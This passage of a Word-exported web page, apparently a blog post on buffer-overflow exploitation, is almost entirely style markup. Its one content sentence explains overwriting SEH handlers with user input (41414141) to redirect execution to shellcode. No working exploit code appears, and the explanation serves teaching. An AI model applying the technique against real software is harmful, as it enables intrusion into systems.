LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/> <w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/> <w:LsdException Locked="false" Priority="39" Name="toc 1"/> <w:LsdException Locked="false" Priority="39" Name="toc 2"/> <w:LsdException Locked="false" Priority="39" Name="toc 3"/> <w:LsdException Locked="false" Priority="39" Name="toc 4"/> <w:LsdException Locked="false" Priority="39" Name="toc 5"/> <w:LsdException Locked="false" Priority="39" Name="toc 6"/> <w:LsdException Locked="false" Priority="39" Name="toc 7"/> <w:LsdException Locked="false" Priority="39" Name="toc 8"/> <w:LsdException Locked="false" Priority="39" Name="toc 9"/> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/> <w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/> <w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/> <w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/> <w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/> <w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/> <w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/> <w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/> <w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/> <w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style> <![endif]--><span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: EN-US; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;">SEH handlers also get overwritten with 41414141 which is user specified input. An attacker can execute malicious code by pointing this SEH handler to his/her choice of address where malicious code (shellcode) is placed in memory.</span><br />
<br />
<!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves/> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF/> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables/> <w:SnapToGridInCell/> <w:WrapTextWithPunct/> <w:UseAsianBreakRules/> <w:DontGrowAutofit/> <w:SplitPgBreakAndParaMark/> <w:DontVertAlignCellWithSp/> <w:DontBreakConstrainedForcedTables/> <w:DontVertAlignInTxbx/> <w:Word11KerningPairs/> <w:CachedColBalance/> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math"/> <m:brkBin m:val="before"/> <m:brkBinSub m:val="--"/> <m:smallFrac m:val="off"/> <m:dispDef/> <m:lMargin m:val="0"/> <m:rMargin m:val="0"/> <m:defJc m:val="centerGroup"/> <m:wrapIndent m:val="1440"/> <m:intLim m:val="subSup"/> <m:naryLim m:val="undOvr"/> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/> <w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/> <w:LsdException Locked="false" Priority="39" Name="toc 1"/> <w:LsdException Locked="false" Priority="39" Name="toc 2"/> <w:LsdException Locked="false" Priority="39" Name="toc 3"/> <w:LsdException Locked="false" Priority="39" Name="toc 4"/> <w:LsdException Locked="false" Priority="39" Name="toc 5"/> <w:LsdException Locked="false" Priority="39" Name="toc 6"/> <w:LsdException Locked="false" Priority="39" Name="toc 7"/> <w:LsdException Locked="false" Priority="39" Name="toc 8"/> <w:LsdException Locked="false" Priority="39" Name="toc 9"/> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/> <w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/> <w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/> <w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/> <w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/> <w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/> <w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/> <w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/> <w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/> <w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
